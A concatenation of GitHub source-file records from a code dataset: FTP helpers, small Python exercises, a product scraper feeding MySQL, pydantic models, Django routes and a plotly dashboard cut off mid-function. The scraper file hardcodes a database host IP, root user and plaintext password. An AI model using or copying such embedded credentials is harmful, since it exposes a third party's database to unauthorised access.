:type path: string\n :param id: The id of the note to be edited\n :type id: string\n :param index: The index of the block to edit, zero based\n :type index: int\n :param new: The new string to be inserted in the specified index\n :type new: string\n \"\"\"\n master_update(ftp)\n x = -1\n with open(path) as f:\n for line_terminated in f:\n x += 1\n data = line_terminated.split(\";\")\n if (data[0] == id):\n break\n db_edit(path, x, index, new)\n ftp.storbinary(\"STOR master.txt\", open(path, \"rb\"))\n\n\ndef master_ls(ftp, path):\n \"\"\"\n :param ftp: The ftp object\n :type ftp: FTP\n :param path: Path where master.txt is located:\n :type path: string\n \"\"\"\n master_update(ftp)\n v = []\n with open(path) as f:\n for line_terminated in f:\n v.append(line_terminated.rstrip())\n return v\n\n\ndef master_update(ftp):\n \"\"\"\n :param ftp: The ftp object\n :type ftp: FTP\n \"\"\"\n if \"master.txt\" in ftp.nlst():\n ftp.retrbinary(\"RETR master.txt\", open(\"master.txt\", \"wb\").write) # TODO Hide file\n\n\nif __name__ == \"__main__\":\n print(\"Debugging master.py\\n\")\n","repo_name":"eliaperantoni/EzAppunti","sub_path":"lib/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"36909591344","text":"from stack import Stack\n\n\n# This creates a new instance of the Stack, named s\n# All stack operations can be performed on s, such as popping and pushing\n# by specifying s.push(item) and s.pop()\ns = Stack()\n\n# A simple program I created to show how this program is used.\n# \"push [item]\" will push something onto the stack\n# \"pop\" will pop the top item off the stack\n# \"print\" will show what is inside the data of the stack at a given time\n# Try printing after you pop something off the stack to see what happens!\nwhile True:\n\tline = input()\n\tif line == \"exit\":\n\t\tbreak\n\tline = line.split(\" \")\n\tif line[0] == \"push\":\n\t\tprint(\"--> Pushing %s\" % line[1])\n\t\ts.push(line[1])\n\telif line[0] == \"pop\":\n\t\tprint(\"--> Popped %s\" % s.pop())\n\telif line[0] == \"print\":\n\t\tprint(\"--> data: %s\" % s.data)\n\t\tprint(\"--> index: %i\" % s.idx)\n\telse:\n\t\tprint(\"Command not recognized\")\n","repo_name":"klieth/HS","sub_path":"Stack/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9590839135","text":"from itertools import permutations\n\ndef solution(k, dungeons):\n answer = -1\n new_list = list(permutations(dungeons, len(dungeons)))\n arr = []\n for i in new_list:\n limit = k\n cnt = 0\n for j in i:\n required, consumption = j\n if limit >= required:\n limit -= consumption\n cnt += 1\n else:\n break\n arr.append(cnt)\n\n answer = max(arr)\n return answer\n\n# k\t dungeons\t result\n# 80\t[[80,20],[50,40],[30,10]]\t3\n\nprint(solution(k=80, dungeons=[[80,20],[50,40],[30,10]]))","repo_name":"mieumje/Python_Coding_Test","sub_path":"Level2_Programmers/피로도.py","file_name":"피로도.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34087571529","text":"import math\nimport sys\n\ndef f(c,m, v):\n g = 9.8\n return ((g*m)/c)*(1-math.e**(-(c/m)*t))-v\n\n\n\ndef bissecao(c, v, t):\n m_ini = 50\n m_fim = 100\n m_meio = (m_ini+m_fim)/2\n\n while((f(c, m_meio, v) < -0.001) or (f(c,m_meio, v) > 0.001)):\n print(f(c, m_ini, v)*f(c, m_meio, v))\n if(f(c, m_ini, v)*f(c, m_meio, v)<0):\n m_fim = m_meio\n else:\n m_ini = m_meio\n m_meio = (m_ini+m_fim)/2\n \n return m_meio\n\n\nif __name__ == \"__main__\":\n\n c, v, t = map(float, sys.stdin.readline().split())\n \n print('%.2f' % bissecao(c,v,t))\n\n\n","repo_name":"JuniorNunes15/Matematica_Computacional","sub_path":"Topico_2_raízes_de_equacoes/02_paraquedismo.py","file_name":"02_paraquedismo.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"203602536","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport timeit\r\nimport multiprocessing\r\nimport mysql.connector\r\nimport time\r\nfrom datetime import datetime\r\n\r\n# import json\r\n# from collections import OrderedDict\r\n\r\n# 파싱 방법 관련글\r\n# https://godoftyping.wordpress.com/2017/06/24/python-beautifulsoup/\r\n# https://twpower.github.io/84-how-to-use-beautiful-soup\r\n# https://www.crummy.com/software/BeautifulSoup/bs4/doc/#find-previous-siblings-and-find-previous-sibling\r\n\r\nmysqlConnector = mysql.connector.connect(\r\n host=\"13.209.50.185\",\r\n user=\"root\",\r\n passwd=\"cww1003\",\r\n database=\"choi\"\r\n)\r\n\r\nmycursor = mysqlConnector.cursor()\r\n\r\n\r\nstart = timeit.default_timer() #타이머 시작\r\n\r\n# headers = {'User-Agent':'Mozilla/5.0'}\r\n#\r\n# URL = 'https://vintagetalk.co.kr/product/search.html?view_type=&supplier_code=&category_no=&search_type=product_name&keyword=&exceptkeyword=&product_price1=1000&product_price2=100000000&order_by=recent&x=27&y=16&page=350&cate_no='\r\n# # 크롤링하려는 url\r\n# response =requests.get(URL, headers=headers)\r\n# #requests 를 활용하여 header를 붙인 url 접속으로 html을 가져온다.\r\n#\r\n# mall_name = \"vintagetalk\"\r\n#\r\n# html = response.text\r\n# #html을 text로 바꾼다.\r\n# # i = 0\r\n#\r\n# soup = BeautifulSoup(html,'html.parser')\r\n\r\n#html.parser를 사용해서 soup에 넣겠다.\r\n\r\n# selectedList = soup.select('#contents > div.xans-element-.xans-search.xans-search-result.ec-base-product > ul > li')\r\n# div.main_scroll_item.is--product > div > ul > li\r\n#contents > div.xans-element-.xans-search.xans-search-result.ec-base-product > ul > li > div > a'''\r\n'''\r\n이코드는 vintagetalk의 재고가 있는 상품의 모든 데이터를 서버에 저장하기 위한 코드이다.\r\n재고있는 상품 DB에 저장하는 방법 :\r\n 검색시 모든 상품에 공통되는 조건을 검색하면 (EX: 판매가격 범위 0 ~ 1000000원) 전체상품을 볼 수 있다.\r\n 최신순으로 250개씩 페이징 되어 보여지며, 재고가 있는 상품부터 보여진다.( 재고없는 상품이 있는 페이지가 나올 시 크롤링 종료)\r\n 1페이지부터 페이지에 있는 모든 상품(재고있는 상품)의 데이터를 서버의 각 쇼핑몰의 테이블에 저장한다.\r\n 한페이지가 끝나면 다음 페이지를 같은방식으로 진행한다.\r\n 이러다 팔린상품이 나오면 코드진행을 종료한다.\r\n\r\n 이 코드는 쇼핑몰의 트레픽이 덜 몰릴것으로 예상 되는 시간대를 선정해 하루 3번 실행한다.\r\n 그 사이에 팔린 상품은 걸러줄 수 없다.\r\n # 이경우는 한명의 클라가 A상품 상세포기를 눌렀을때 재고가 없는 상품이었을 경우\r\n 클라가 서버로 이 A상품은 재고가 없다는 것을 알려주어 DB를 업데이트 할 수 있게 한다.\r\n 이렇게 하면 그 후 다른 사용자에게는 A상품이 재고가 없다는 것을 반영하여 데이터를 재공할 수 있다. \r\n\r\n'''\r\n\r\ni = 0\r\nisItem = True\r\n\r\ndef parsing(i):\r\n global isItem\r\n # print(selectedList[0].__len__(),\"개\")\r\n # for value in range(0,index):\r\n headers = {'User-Agent':'Mozilla/5.0'}\r\n\r\n URL = 'https://vintagetalk.co.kr/product/search.html?view_type=&supplier_code=&category_no=&search_type=product_name&keyword=&exceptkeyword=&product_price1=1000&product_price2=100000000&order_by=recent&x=27&y=16&page='+str(i)+'&cate_no='\r\n # 크롤링하려는 url\r\n # print(URL)\r\n response =requests.get(URL, headers=headers)\r\n #requests 를 활용하여 header를 붙인 url 접속으로 html을 가져온다.\r\n\r\n mall_name = \"vintagetalk\"\r\n\r\n html = response.text\r\n #html을 text로 바꾼다.\r\n # i = 0\r\n\r\n soup = BeautifulSoup(html,'html.parser')\r\n #html.parser를 사용해서 soup에 넣겠다.\r\n selectedList = soup.select('#contents > div.xans-element-.xans-search.xans-search-result.ec-base-product > ul > li')\r\n number = 0\r\n for value in selectedList:\r\n # alist = selectedList[value]\r\n alist = value\r\n\r\n # i = i+1\r\n atag = alist.find(\"a\")\r\n href = atag.get(\"href\")\r\n # print(href)\r\n\r\n img = alist.find(\"img\")\r\n # print(img) #이미지 태그 부분을 전부 찾아낸다.\r\n # find_all 을 썼을땐 get(\"\")를 쓸 수 없고, find를 썼을때만 get()를 쓸 수 있다\r\n\r\n\r\n imgs = alist.find_all(\"img\")\r\n # print(imgs.__len__())\r\n # print(imgs)\r\n # 상품정보가 담겨있는 li 태그 안에\r\n # img 태그가 3개면 soldout 된 상품이다. ( = 2번째 img태그가 soldout icon이다.)\r\n # img 태그가 2개면 제고가 있는 상품이다.\r\n number = number+1\r\n # if number == 30:\r\n # break\r\n # print(number)\r\n if imgs.__len__()==3:\r\n print(\"break\")\r\n isItem = False\r\n break\r\n\r\n # print(img.get(\"data-original\"))\r\n img_src = img.get(\"data-original\")\r\n # 2-3. 상품 이미지url값을 추출한다. // 왜 추출하는지 써야한다.\r\n # 이미지 url로 앱에서 이미지를 로드해 보여주기 때문에\r\n # print(img.get(\"alt\"))\r\n # prodName = img.get(\"alt\")\r\n splitedImgsrc = img_src.split('/')\r\n preProdNumb = splitedImgsrc[(splitedImgsrc.__len__()-1)].split('.')\r\n prodNumb = preProdNumb[0]\r\n # print(prodNumb)\r\n\r\n\r\n prices = alist.find_all('span') # tag 에서 span 을 다 찾아낸다.\r\n\r\n size = prices.__len__()\r\n #\r\n # print(prices[size-6].text)\r\n prodName = prices[size-6].text\r\n # 2-4. 상품 이름값을 추출한다.\r\n\r\n # print(prices[size-4])\r\n originalPrice = prices[size-4].text\r\n # print(originalPrice)\r\n #세일전 가격\r\n\r\n # print(prices[size-1].text)\r\n price = prices[size-1].text\r\n # 2-5. 상품 가격을 추출한다.\r\n\r\n\r\n\r\n\r\n # sql = \"INSERT INTO allProducts_vintagetalk (mallName, img_src, prodName, prodNumb, price, salePrice, prodHref, modifiedDate, soldout) VALUES (%s, %s, %s, %s, %s, %s, %s, NOW(), %s)\"\r\n sql = \"INSERT INTO allProducts_vintagetalk (mallName, img_src, prodName, prodNumb, price, salePrice, prodHref, modifiedDate, soldout) VALUES (%s, %s, %s, %s, %s, %s, %s, NOW(), %s) ON DUPLICATE KEY UPDATE modifiedDate=NOW()\"\r\n mycursor.execute(sql, (mall_name, img_src, prodName, prodNumb, originalPrice, price, href, 1))\r\n\r\n\r\n # print()\r\n # break\r\n\r\n #print()\r\n\r\n # print(tag.text.strip())\r\n #tag 에서 텍스트만 보여주고, 쓸대없는 공백도 지운다.\r\n # file_data = OrderedDict()\r\n\r\ntesks = [0, 100, 200]\r\n# i = 0\r\n# for num in tesks:\r\n# parsing(num)\r\n\r\nwhile isItem:\r\n i = i+1\r\n #119\r\n # i = 1\r\n print(\"------------------------------\")\r\n print(i)\r\n parsing(i)\r\n mysqlConnector.commit()\r\n print(str(i)+\"페이지 후 3초 대기\")\r\n time.sleep(3) #차단 방지를 위해 2초 대기\r\n\r\n\r\n # break;\r\n # pass\r\n\r\n\r\n\r\n# if __name__ == '__main__':\r\n# #멀티쓰레딩 pool 사용\r\n# pool = multiprocessing.Pool(processes=3)\r\n# pool.map(parsing, tesks)\r\n# pool.close()\r\n# pool.join()\r\n\r\nstop = timeit.default_timer()\r\nprint(stop - start)\r\n# print(i)\r\n#이건 안되는겨?\r\n\r\n\r\n# # tag.select('\r\n# # img = tag.find_all(\"src\")\r\n# # img_url = tag.get(\"src\")\r\n# # img = tag.select('img')\r\n#\r\n# # div > div.thumbnail > a = 썸네일\r\n# # div.name > a > span:nth-child(2) > b 브랜드\r\n#\r\n#\r\n# # img_alt = img.get(\"src\")\r\n# img = tag.find(\"img\") #이미지 태그 부분을 전부 찾아낸다.\r\n# # print(img)\r\n# # find_all 을 썼을땐 get(\"\")를 쓸 수 없고, find를 썼을때만 get()를 쓸 수 있다.\r\n# print(img.get(\"src\"))\r\n# print(img.get(\"alt\"))\r\n#\r\n# prices = tag.find_all('span')\r\n# #tag 에서 span 을 다 찾아낸다.\r\n#\r\n# size = prices.__len__()\r\n# print(prices[size-2].text) #r가격\r\n#\r\n# # coasts = tag.find_all(\"li\", rel=\"판매가\")\r\n# # print(coasts[0].get_text)\r\n# # # for coast in coasts.find_all('span'):\r\n# # # print(coast)\r\n#\r\n#\r\n# icon = tag.find(\"div\", class_=\"icon\") # 솔드아웃\r\n# # print(icon.get('alt'))\r\n# # soldout = icon.get(\"alt\")\r\n# # print(soldout)\r\n# # 상품가격을 가져온다. (= 5번째 span 값)\r\n# # soldout = icon[0].find(\"img\")\r\n# # print(icon)\r\n# test = icon.find('img')\r\n# print(test)\r\n# # 이렇게 하면 풀저x = none, 품절o = 값이 있음\r\n# # none 인지 아닌지로 구분하면 된다.\r\n","repo_name":"AllenChoiwonwoo/ec2Backup","sub_path":"test/getAllUnselledProduct.py","file_name":"getAllUnselledProduct.py","file_ext":"py","file_size_in_byte":8689,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14201905331","text":"pnums = __import__(\"#61-2 - Cyclical Figurate Numbers - Polygonal\")\n\n\ndef permute(values):\n values = list(values)\n values.sort()\n end = list(values[::-1])\n permutations = [list(values)]\n current = list(values)\n while current != end:\n indexk = max([index for index in range(len(current)-1) if current[index] < current[index+1]])\n indexl = max([index for index in range(indexk, len(current)) if current[indexk] < current[index]])\n current[indexk], current[indexl] = current[indexl], current[indexk]\n current[indexk+1:] = current[:indexk:-1]\n permutations.append(list(current))\n return permutations\n\n\ntris = [[n, pnums.triangle(n)] for n in range(45, 141)] # T(45) = first 4 digit, T(140) = last 4 digit\nsquares = [[n, pnums.square(n)] for n in range(32, 100)] # S(32) = first 4 digit, S(99) = last 4 digit\npentas = [[n, pnums.pentagonal(n)] for n in range(26, 82)] # P(26) = first 4 digit, P(81) = last 4 digit\nhexas = [[n, pnums.hexagonal(n)] for n in range(23, 71)] # Hx(23) = first 4 digit, H(70) = last 4 digit\nheptas = [[n, pnums.heptagonal(n)] for n in range(21, 64)] # Hp(21) = first 4 digit, Hp(63) = last 4 digit\noctas = [[n, pnums.octagonal(n)] for n in range(19, 59)] # O(19) = first 4 digit, O(58) = last 4 digit\n\npossible = []\n\n# The following code doesn't work, and is unlikely to.\n# I wrote it after having interpreted the problem incorrectly.\n\nfor triI, triN in tris:\n cusquares = list(squares)\n delsquindexes = {int(triI)}\n cusquares = [[i, n] for i, n in cusquares if i not in delsquindexes]\n tribegins = [str(triN)[:2]]\n triends = [str(triN)[2:]]\n cusquares = [[i, n] for i, n in cusquares if (str(n)[2:] in tribegins) or (str(n)[:2] in triends)]\n\n for squI, squN in cusquares:\n cupentas = list(pentas)\n delpenindexes = set(delsquindexes)\n delpenindexes.add(int(squI))\n cupentas = [[i, n] for i, n in cupentas if i not in delpenindexes]\n squbegins = tribegins.copy() + [str(squN)[:2]]\n squends = triends.copy() + [str(squN)[2:]]\n cupentas = [[i, n] for i, n in cupentas if (str(n)[2:] in squbegins) or (str(n)[:2] in squends)]\n\n for penI, penN in cupentas:\n cuhexas = list(hexas)\n delhexindexes = set(delpenindexes)\n delhexindexes.add(int(penI))\n cuhexas = [[i, n] for i, n in cuhexas if i not in delhexindexes]\n penbegins = squbegins.copy() + [str(penN)[:2]]\n penends = squends.copy() + [str(penN)[2:]]\n cuhexas = [[i, n] for i, n in cuhexas if (str(n)[2:] in penbegins) or (str(n)[:2] in penends)]\n\n for hexI, hexN in cuhexas:\n cuheptas = list(heptas)\n delhepindexes = set(delhexindexes)\n delhepindexes.add(int(hexI))\n cuheptas = [[i, n] for i, n in cuheptas if i not in delhepindexes]\n hexbegins = penbegins.copy() + [str(hexN)[:2]]\n hexends = penends.copy() + [str(hexN)[2:]]\n cuheptas = [[i, n] for i, n in cuheptas if (str(n)[2:] in hexbegins) or (str(n)[:2] in hexends)]\n\n for hepI, hepN in cuheptas:\n cuoctas = list(octas)\n deloctindexes = set(delhepindexes)\n deloctindexes.add(int(hepI))\n cuoctas = [[i, n] for i, n in cuoctas if i not in deloctindexes]\n hepbegins = hexbegins.copy() + [str(hepN)[:2]]\n hepends = hexends.copy() + [str(hepN)[2:]]\n cuoctas = [[i, n] for i, n in cuoctas if (str(n)[2:] in hepbegins) or (str(n)[:2] in hepends)]\n\n for octI, octN in cuoctas:\n nums = [triN, squN, penN, hexN, hepN, octN]\n possible.append(nums)\n\nfound = False\nlength = len(possible)\nfor numsi, nums in enumerate(possible):\n for check in permute(nums):\n works = True\n for i in range(-1, len(check)-1):\n works = False if str(check[i])[2:] != str(check[i+1])[:2] else works\n if works:\n found = check.copy()\n break\n if found:\n break\n if numsi % 15 == 0:\n print(\"Completed %s of %s possible sequence checks.\" % (numsi, length))\n\nif found:\n print(\"FOUND SEQUENCE!\")\n print(found)\n print(\"Sum: %s\" % sum(found))\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Project Euler/#61 - Cyclical Figurate Numbers.py","file_name":"#61 - Cyclical Figurate Numbers.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31990022508","text":"import random\n\n# gives you the start\naction = input(\"Enter a choice (rock, paper, scissors): \\n\")\n\n# gives the choices\nchoices = [\"rock\", \"paper\", \"scissors\"]\ncomputer_choice = random.choice(choices)\nprint(f\"\\nYou chose {action}, computer chose {computer_choice}.\\n\")\n\n# tales the choices and then determines the winner\nif action == computer_choice:\n print(f\"Both players selected {action}. It's a tie!\")\nelif action == \"rock\":\n\n if computer_choice == \"scissors\":\n print(\"Rock smashes scissors! You win!\")\n else:\n print(\"Paper covers rock! You lose.\")\n\nelif action == \"paper\":\n if computer_choice == \"rock\":\n print(\"Paper covers rock! You win!\")\n else:\n print(\"Scissors cuts paper! You lose.\")\n\nelif action == \"scissors\":\n if computer_choice == \"paper\":\n print(\"Scissors cuts paper! You win!\")\n else:\n print(\"Rock smashes scissors! You lose.\")\n \n","repo_name":"cruz006/python","sub_path":"projects/rock-paper-scissors.py","file_name":"rock-paper-scissors.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13642522518","text":"from pydantic import BaseModel, Field, EmailStr, validator\nfrom typing import Optional, List\nfrom bson import ObjectId\nfrom datetime import datetime\nfrom pprint import pprint\nfrom app.pkg.mongo_tools.tools import MongoTools\n\n\nclass PyObjectId(ObjectId):\n @classmethod\n def __get_validators__(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, v):\n if not ObjectId.is_valid(v):\n raise ValueError(\"Invalid objectid\")\n return ObjectId(v)\n\n @classmethod\n def __modify_schema__(cls, field_schema):\n field_schema.update(type=\"string\")\n\n\n'''User's model'''\n\nclass StatusModel(BaseModel):\n id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n status: str\n icon: str\n\nclass UserModel(BaseModel):\n vk: str = Field(..., alias=\"_id\")\n disabled: bool = False\n status: List[StatusModel] | None = None\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n \"example\": {\n \"vk\": \"123456789\",\n \"disabled\": False,\n \"status\": []\n }\n }\n\nclass User(UserModel):\n hashed_password: str\n\n\n'''Category's model'''\n\nclass CategoryModel(BaseModel):\n category: str = Field(..., alias=\"_id\")\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n 'example': {\n 'category': 'Метрология'\n }\n }\n\n\n'''University's model'''\n\nclass UniversityModel(BaseModel):\n university: str = Field(..., alias=\"_id\")\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n 'example': {\n 'university': 'ТИУ'\n }\n }\n\n\n'''File's model'''\n\nclass FileModel(BaseModel):\n # id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n path: str\n\n\n'''Responce's model'''\n\nclass ResponceModel(BaseModel):\n id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n text: str\n price: int\n deliveryDate: str\n\n owner: UserModel\n created: str = datetime.strftime(datetime.now(), '%d.%m.%Y %H:%M')\n\n # @validator(\"deliveryDate\", pre=True)\n # def parse_deliveryDate(cls, value):\n # return datetime.strptime(\n # value,\n # '%d.%m.%Y %H:%M'\n # )\n \n # @validator(\"created\", pre=True)\n # def parse_created(cls, value):\n # return datetime.strptime(\n # value,\n # '%d.%m.%Y %H:%M'\n # )\n \n # @validator(\"owner\", pre=True)\n # async def check_link(cls, value):\n # user = await MongoTools.find_one('users', {'vk_id': value})\n # if user:\n # return user['_id']\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n \"example\": {\n 'text': 'Готов выполнить задание!',\n 'price': 1200,\n 'deliveryDate': '12.12.2023 14:10',\n 'owner': {\n '_id': '123456789'\n },\n 'created': '12.12.2000 14:10',\n }\n }\n \n \n\n\n'''Task's model'''\n\nclass TaskModel(BaseModel):\n id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n title: str\n description: str\n category: CategoryModel\n university: UniversityModel\n orderDate: str = datetime.strftime(datetime.now(), '%d.%m.%Y %H:%M')\n deliveryDate: str\n files: List[FileModel] = []\n is_published: bool = False\n owner: UserModel\n responces: List[ResponceModel] = []\n\n # @validator(\"orderDate\", pre=True)\n # def parse_date(cls, value):\n # return datetime.strptime(\n # value,\n # '%d.%m.%Y %H:%M'\n # )\n \n # @validator(\"deliveryDate\", pre=True)\n # def parse_deliveryDate(cls, value):\n # return datetime.strptime(\n # value,\n # '%d.%m.%Y %H:%M'\n # )\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n \"example\": {\n \"title\": \"Сделать метрологию\",\n \"description\": \"ПАМАГИТЕ\",\n \"category\": {\n \"category\": \"Метрология\"\n },\n \"university\": {\n \"university\": \"ТИУ\"\n },\n \"orderDate\": \"05.05.2023 14:00\",\n \"deliveryDate\": \"12.05.2023 14:00\",\n \"files\": [],\n \"is_published\": True,\n \"owner\": {\n \"vk\": \"123456789\"\n },\n \"responces\": [],\n }\n }\n\n\nclass UTaskModel(BaseModel):\n title: Optional[str]\n description: Optional[str]\n category: Optional[CategoryModel]\n university: Optional[UniversityModel]\n deliveryDate: Optional[datetime]\n files: Optional[List[FileModel]] = []\n is_published: Optional[bool] = False\n responces: Optional[List[ResponceModel]] = []\n \n @validator(\"deliveryDate\", pre=True)\n def parse_deliveryDate(cls, value):\n return datetime.strptime(\n value,\n '%d.%m.%Y %H:%M'\n )\n\n class Config:\n arbitrary_types_allowed = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n \"example\": {\n \"title\": \"Сделать метрологию\",\n \"description\": \"ПАМАГИТЕ\",\n \"category\": {\n \"category\": \"Метрология\"\n },\n \"university\": {\n \"university\": \"ТИУ\"\n },\n \"orderDate\": \"05.05.2023 14:00\",\n \"deliveryDate\": \"12.05.2023 14:00\",\n \"files\": [],\n \"is_published\": True,\n \"owner\": {\n \"vk\": \"123456789\"\n },\n \"responces\": [],\n }\n }\n\n\n'''Token's model'''\n\nclass Token(BaseModel):\n # id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n acces_token: str\n token_type: str\n\nclass TokenData(BaseModel):\n # id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n vk_id: str","repo_name":"M1nt1k/stdx-fast-api-server","sub_path":"app/internal/schemas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40186266992","text":"from typing import Tuple, Optional\nfrom pathlib import Path\nimport numpy as np\n\n\nclass DataGenerator(object):\n\n def __init__(self, config: int):\n super().__init__()\n self.__instance_num = config['instance_num']\n self.__ele_val_range = config['element_val_range']\n\n def generate(self, input_shapes: dict, exp_dir: str, output_shapes: Optional[dict] = None):\n # 创建存放位置\n save_dir = Path(exp_dir) / 'dataset'\n save_dir.mkdir(parents=True, exist_ok=True)\n\n # 生成dataset\n data_inputs_path = save_dir / 'inputs.npz'\n data_inputs = {input_name: self.__generate(input_shape) for input_name, input_shape in input_shapes.items()}\n np.savez(data_inputs_path, **data_inputs)\n\n # 生成ground_truth\n if output_shapes:\n ground_truths_path = save_dir / 'ground_truths.npz'\n ground_truths = {output_name: self.__generate(output_shape) for output_name, output_shape in output_shapes.items()}\n np.savez(ground_truths_path, **ground_truths)\n\n def __generate(self, shape: Tuple[Optional[int]]):\n a, b = self.__ele_val_range\n return np.random.rand(*(self.__instance_num, *shape[1:])) * (b - a) + a\n\n\nif __name__ == '__main__':\n config = {\n 'instance_num': 5,\n 'element_val_range': (-1000, 1000),\n }\n vig = DataGenerator(config)\n print(vig.generate((2, 3)))\n","repo_name":"library-testing/Muffin","sub_path":"src/cases_generation/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"5453861237","text":"from django.urls import path\nfrom book.views import (\n BookDetailView,\n CategoryListView,\n SubCategoryListView,\n BookSearchView,\n CommentView,\n CommentLikeView,\n BooklistView\n)\n\nurlpatterns = [\n path('/', BookDetailView.as_view()),\n path('/category', CategoryListView.as_view()),\n path('/category/', SubCategoryListView.as_view()),\n path('/search/', BookSearchView.as_view()),\n path('//comment', CommentView.as_view()),\n path('/commentlike', CommentLikeView.as_view()),\n path('', BooklistView.as_view()),\n]\n","repo_name":"wecode-bootcamp-korea/13-Wellie-backend","sub_path":"book/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21869801524","text":"import pandas as pd\nimport plotly.graph_objs as go\n\n\ndef cleandata(dataset, keepcolumns = ['Country Name', '1990','1995','2000' ,'2015'], value_variables = ['1990', '1995','2000','2015']):\n \"\"\"Clean world bank data for a visualizaiton dashboard\n\n Keeps data range of dates in keep_columns variable and data for the top 10 economies\n Reorients the columns into a year, country and value\n Saves the results to a csv file\n\n Args:\n dataset (str): name of the csv data file\n\n Returns:\n None\n\n \"\"\" \n df = pd.read_csv(dataset, skiprows=4)\n\n # Keep only the columns of interest (years and country name)\n df = df[keepcolumns]\n\n top10country = ['United States', 'China', 'Japan', 'Germany', 'United Kingdom', 'India', 'France', 'Brazil', 'Italy', 'Canada']\n df = df[df['Country Name'].isin(top10country)]\n\n # melt year columns and convert year to date time\n df_melt = df.melt(id_vars='Country Name', value_vars = value_variables)\n df_melt.columns = ['country','year', 'variable']\n df_melt['year'] = df_melt['year'].astype('datetime64[ns]').dt.year\n\n # output clean csv file\n return df_melt\n\ndef return_figures():\n \"\"\"Creates four plotly visualizations\n\n Args:\n None\n\n Returns:\n list (dict): list containing the four plotly visualizations\n\n \"\"\"\n\n # first chart plots arable land from 1990 to 2015 in top 10 economies \n # as a line chart\n \n graph_one = []\n df = cleandata('data/WB_GDP_per_capita.csv', \\\n keepcolumns = [ 'Country Name' ,'1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014'],\\\n value_variables = [ '1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014'] ) # WB_GDP_per_capita API_AG.LND.ARBL.HA.PC_DS2_en_csv_v2\n df.columns = ['country','year','gdp']\n df.sort_values('year', ascending=False, inplace=True)\n countrylist = df.country.unique().tolist()\n \n for country in countrylist:\n x_val = df[df['country'] == country].year.tolist()\n y_val = df[df['country'] == country].gdp.tolist()\n graph_one.append(\n go.Scatter(\n x = x_val,\n y = y_val,\n mode = 'lines',\n name = country\n )\n )\n\n layout_one = dict(title = 'Change in GDP per capita
b/w 1990 to 2015',\n xaxis = dict(title = 'Year',\n autotick=False, tick0=1990, dtick=25),\n yaxis = dict(title = 'GDP'),\n )\n\n# second chart plots ararble land for 2015 as a bar chart \n graph_two = []\n df = cleandata('data/WB_Labor_force.csv')\n df.columns = ['country','year','laborforce']\n df.sort_values('laborforce', ascending=False, inplace=True)\n df = df[df['year'] == 2015] \n\n graph_two.append(\n go.Bar(\n x = df.country.tolist(),\n y = df.laborforce.tolist(),\n )\n )\n\n layout_two = dict(title = 'Total Labor force in 2015',\n xaxis = dict(title = 'Country',),\n yaxis = dict(title = 'Total Labor Force'),\n )\n\n\n# third chart plots percent of population that is rural from 1990 to 2015\n graph_three = []\n df = cleandata('data/WB_Elec_Pwr_cnsmp.csv', \\\n keepcolumns = [ 'Country Name' ,'1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014'],\\\n value_variables = [ '1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014'] )\n df.columns = ['country', 'year', 'elec']\n df.sort_values('year', ascending=False, inplace=True)\n for country in countrylist:\n x_val = 